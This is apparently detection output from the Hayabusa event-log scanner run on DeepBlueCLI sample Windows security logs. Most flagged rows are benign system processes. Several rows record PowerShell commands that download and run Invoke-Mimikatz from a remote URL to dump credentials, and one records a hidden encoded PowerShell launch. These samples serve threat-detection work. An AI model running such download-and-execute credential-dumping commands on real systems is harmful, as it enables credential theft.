0x7d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:38:00.158 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:43:45.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:43:48.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:44:06.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:46:45.647 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:45.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.850 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 
0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 06:11:59.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 07:17:58.251 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 07:17:58.259 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:50.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:50.394 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" 
| Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:51.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:51.099 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:36:35.595 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:39.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:44.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.019 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | 
LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:56:33.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 09:49:33.186 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 09:49:33.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:56.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob 
-WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:57.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:57.955 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.750 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.752 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:22:11.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:22:11.319 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 
0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:37.371 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:37.402 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus 
Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 01:46:13.438 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 01:46:13.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:54.269 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:55.299 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:55.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:45:05.616 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 11:00:00.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 13:15:14.072 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 13:15:14.084 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.766 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.851 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.855 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:31.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:31.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
